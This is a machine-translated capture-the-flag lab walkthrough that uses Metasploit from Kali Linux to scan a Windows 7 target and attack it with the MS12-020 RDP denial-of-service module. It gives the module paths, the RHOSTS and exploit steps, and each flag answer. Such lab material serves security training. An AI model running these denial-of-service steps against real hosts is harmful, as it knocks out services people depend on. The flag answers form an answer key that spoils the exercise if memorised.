Service Vulnerability scanning and utilization

First step , Open the network topology , Start the experimental virtual machine , View the virtual machines separately IP Address ：

Kali Linux

Windows 7

1. Through the infiltration machine Kali Linux For the target scene Windows 7 Conduct system service and version scanning penetration test , And display the operation in the result 3389 The service status information corresponding to the port is used as Flag Value submission ;

Get into kali The following commands are used in the command console

Flag：open

2. stay msfconsole of use search The command to search MS12020 RDP Denial of service attack module , The vulnerability disclosure time in the echo result is taken as Flag value （ Such as ：2012-10-16） Submit ;

Use command msfconsole Get into kali Penetration testing platform , Then use the command search ms12_020 Search for RDP Denial of service attack module .

Flag：2012-03-16

3. stay msfconsole In the use of MS12020 RDP Denial of Service Vulnerability auxiliary scanning module , Call the command of this module as Flag Value submission ;

Use command use auxiliary/scanner/rdp/ms12_020_check

Flag：use auxiliary/scanner/rdp/ms12_020_check

4. In the 3 Check the options you need to set based on the questions , And take the option name that must be set in the echo as Flag Value submission ;

Use the command based on the previous question show options Check the parameters to be configured , find Required The status in the column is yes And the parameter name that is empty in the parameter setting column

Flag：RHOSTS

5. Use set Command set target IP（ In the 4 Based on the question ）, And detect whether the vulnerability exists , Run this module to take the last word in the penultimate line of the echo result as Flag Value submission ;

Use command exploit To detect the existence of vulnerabilities in the target system

Flag：complete

6. stay msfconsole In the use of MS12020 RDP Denial of service attack module , Call the command of this module as Flag Value submission ;

Use the following command use auxiliary/dos/windows/rdp/ms12_020_maxchannelids call ms12_020 RDP Denial of service attack module .

Flag：use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

7. Use set Command set target IP（ In the 6 Based on the question ）, Use MS12020 Denial of service attack module , Run this module to take the last word in the penultimate line of the echo result as Flag Value submission ;

Use command set RHOSTS Set the target IP Address , Then use the command exploit function RDP Denial of service module , View echo results

Flag：completed

8. Enter the target and close the remote desktop service , Run again MS12020 Denial of service attack module , Run this module and take the last word in the penultimate line of the echo result as Flag Value submission .

Enter the target and close the remote desktop service

Then use the command rexploit Run again RDP Denial of service module , View echo results

Flag：Unreachable